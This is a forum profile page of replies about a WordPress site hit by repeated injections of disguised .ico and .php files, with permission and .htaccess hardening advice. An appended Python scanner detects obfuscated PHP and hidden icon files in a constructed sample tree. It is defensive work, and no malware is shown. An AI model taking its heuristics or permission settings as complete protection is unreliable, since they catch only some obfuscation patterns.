Steven Baron

Forum Replies Created

Viewing 10 posts - 1 through 10 (of 10 total)
  • in reply to: Grandson #2328

    Steven Baron
    Member

    Saw your post about your grandson being in the hospital.  Wishing him a speedy recovery :)   Do me a favor send me an email at my registered email address…

    • This topic was modified 5 years, 4 months ago by  Steven Baron.
    in reply to: Core File Changes #2327

    Steven Baron
    Member

    Any chance you can make the core file scan/restore to defaults a CRON job option so it is just automatic?

    in reply to: NEW Version 4.18.52 #2198

    Steven Baron
    Member

    I see you have included a database scanner :)


    Thank you for the continued development!!!

    in reply to: Interesting detection… #2184

    Steven Baron
    Member

    Is that a session code that expires?  The majority of my issues are injection related…

    in reply to: Interesting detection… #2182

    Steven Baron
    Member

    Scan found this location:

    wp-content/plugins/gotmls/safe-load/_SESSION/.GOTMLS.69d73f2d111e766c58bafc8c8846db83.php


    Had this code:


    in reply to: Blocking Injections #2181

    Steven Baron
    Member

    Most of my sites seem to be continually hacked, no matter how many times I scan and clean the files.  Typically it is the uploading of PHP and ICO files along with code injection to existing files.  In an effort to block the injection I am looking at setting custom permissions and wanted some feedback on your thoughts…

    All *.php files set to 544 to avoid write permission and prevent injection.
    Folders set to 555 and "wp-upload" to 755.

    The wp-config file would need to be 755 else plugins such as GOTMLS would not be able to write in the brute force code to it.

    I have also been working on a custom htaccess file for the uploads folder.  GOTMLS flags it as a threat for some reason…

    # Only allow the following direct access to the uploads directory
    RewriteCond %{REMOTE_ADDR} !^(?:xxx\.xxx\.xxx\.xxx)
    RewriteCond %{HTTP_HOST} !^localhost$ [NC]
    RewriteCond %{HTTP_REFERER} !^https?://(?:[^.]+\.)?example\.com/ [NC]
    RewriteRule .? http://example.com [L]

    # Disable hotlinking of images
    RewriteCond %{REQUEST_FILENAME} -f
    RewriteCond %{REQUEST_FILENAME} \.(?:jpe?g|png|gif)$ [NC]
    RewriteCond %{HTTP_REFERER} !^(?:https?://(?:[^.]+\.)?example\.com/|$) [NC]
    RewriteRule \.(?:jpe?g|png|gif)$ - [NC,F]

    # Only allow GET and POST request methods
    <LimitExcept GET POST>
    Deny from all
    </LimitExcept>

    For those that do not know what each line does, I’ve broken it down here. By first listing the rule, then following up with a description of what it does:

    # Disable any cgi-scripts and prevent directory browsing
    Options -ExecCGI -Indexes
    This is first to disable any cgi-scripts; it is connected with another rule below. Then it prevents directory listing, viewing, etc.

    # Whitelist the following file extensions
    # This includes the blocking of double extensions using [^.]
    <FilesMatch "(?i)^[^.]+\.(?:jpe?g|png|gif)$">
    Order Allow,Deny
    Allow from all
    </FilesMatch>

    This is the whitelisting of certain file extensions. It is case insensitive and blocks any double extensions, like something.php.jpg or similar. You must note that if users upload legitimate file extensions with a literal period in the filename, they will also be blocked. This is why it's always a good idea to incorporate some type of file renaming utility when they upload files.

    # Secure MIME-types
    <FilesMatch "(?i)\.jpe?g$">
    ForceType image/jpeg
    </FilesMatch>
    <FilesMatch "(?i)\.png$">
    ForceType image/png
    </FilesMatch>
    <FilesMatch "(?i)\.gif$">
    ForceType image/gif
    </FilesMatch>

    in reply to: locked out of website #2174

    Steven Baron
    Member

    I would manually re-upload the WooCommerce plugin.  Alternatively you can also disable your plugins, which should then allow you to log in again and ultimately fix the issue.

    in reply to: Scan potential threats #2170

    Steven Baron
    Member

    Here is an example of 2 .ICO files from different sites that were found and caught by the scanner once I removed it from the skip files…

    wp-includes/js/thickbox/.bcb5a93b.ico
    wp-content/plugins/skimlinks/.f397826e.ico

    in reply to: Scan potential threats #2169

    Steven Baron
    Member

    There are literally dozens of these randomly named files that are scattered throughout the sites.  The code in each one is very different but seems to use the same base for encryption.  With that it seems that .ICO files are a part of the attack.  I would recommend removing it from the skip files with the following extensions.  Do you want me to send you more code samples for comparison?

    Also, in addition to the manual removal request ability on the potential threat location, maybe you should have a submit for evaluation as an option next to the "white list" when you click on the file.  This would save a lot of time reporting and get the attack code in your hands quicker.  If you think it might be misused then maybe activate that option for users that have donated, as it will validate the user and allow a little tighter control.

    in reply to: Scan potential threats #2167

    Steven Baron
    Member

    I have been fighting a continual hack on a bunch of my WP sites.  Then I came across your plugin and am giving it a shot to see how it works.  So far pretty impressed…

    The majority of the attacks seem to be .ICO and .PHP files.  The .ICO are easy as all I do is a file scan and delete them.  The .PHP seem to be arbitrary names.  Your scanner picked a bunch up as potential.  For example…

    wp-admin\pv3f8ux4.php contains:


    Is there any way that if I submit files and code that you can add them to the threat list?  Or is this, just one of those things that will require manual intervention each time? Other suggestions?

    While I can easily navigate to the location it would be nice if the potential threat section had a check box to allow selection and deletion of files.
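    An added defender-side sweep, written for this page and not part of the GOTMLS plugin or the poster's own tooling, that walks a WordPress tree for the indicators described across these posts: hidden random-named .ico dotfiles, PHP dropped under wp-content/uploads, PHP left writable despite the 544 recommendation, and PHP that combines eval with long \xNN-escaped strings. The sample tree, its file contents and the regexes are constructed assumptions; the two file names are the ones the posts report.

```python
"""Sweep a WordPress tree for the indicators discussed in the posts above.
Constructed example; the heuristics are assumptions, not the plugin's rules."""
import os
import re
import stat
import tempfile

ICO_DOTFILE = re.compile(r"^\.[0-9a-f]{8}\.ico$")        # .bcb5a93b.ico style names
HEX_ESCAPE_RUN = re.compile(r"(\\x[0-9a-fA-F]{2}){8,}")  # long \xNN-encoded string
EVAL_TOKEN = re.compile(r"\beval\s*(/\*.*?\*/)?\s*\(")    # eval( or eval/*junk*/(


def check_php_source(text):
    """Return the obfuscation indicators found in one PHP source string."""
    hits = []
    if EVAL_TOKEN.search(text):
        hits.append("eval")
    if HEX_ESCAPE_RUN.search(text):
        hits.append("hex-escaped-string")
    return hits


def scan_tree(root):
    """Walk the tree and return sorted (relative path, reason) pairs."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if ICO_DOTFILE.match(name):
                findings.append((rel, "hidden .ico dotfile"))
                continue
            if not name.lower().endswith(".php"):
                continue
            if rel.startswith("wp-content/uploads/"):
                findings.append((rel, "php in uploads"))  # uploads should hold no PHP
            if os.stat(full).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((rel, "group/world-writable php"))  # violates 544
            with open(full, encoding="utf-8", errors="replace") as fh:
                for hit in check_php_source(fh.read()):
                    findings.append((rel, hit))
    return sorted(findings)


def build_sample_tree():
    """Constructed WordPress-like tree (no real malware) for a dry run."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    samples = {
        "wp-includes/js/thickbox/.bcb5a93b.ico": "not an icon",
        "wp-content/uploads/2018/10/photo.jpg": "jpeg bytes",
        "wp-content/uploads/2018/10/shell.php": "<?php echo 'constructed';",
        "wp-admin/pv3f8ux4.php": '<?php $s = "\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\\x41";'
                                 " eval/*x*/('return 1;');",
        "wp-includes/clean.php": "<?php echo 'fine';",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(path, 0o544)  # the permission the post recommends for PHP
    os.chmod(os.path.join(root, "wp-admin/pv3f8ux4.php"), 0o666)  # left writable
    return root


if __name__ == "__main__":
    for rel, reason in scan_tree(build_sample_tree()):
        print(f"{reason:26} {rel}")
```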
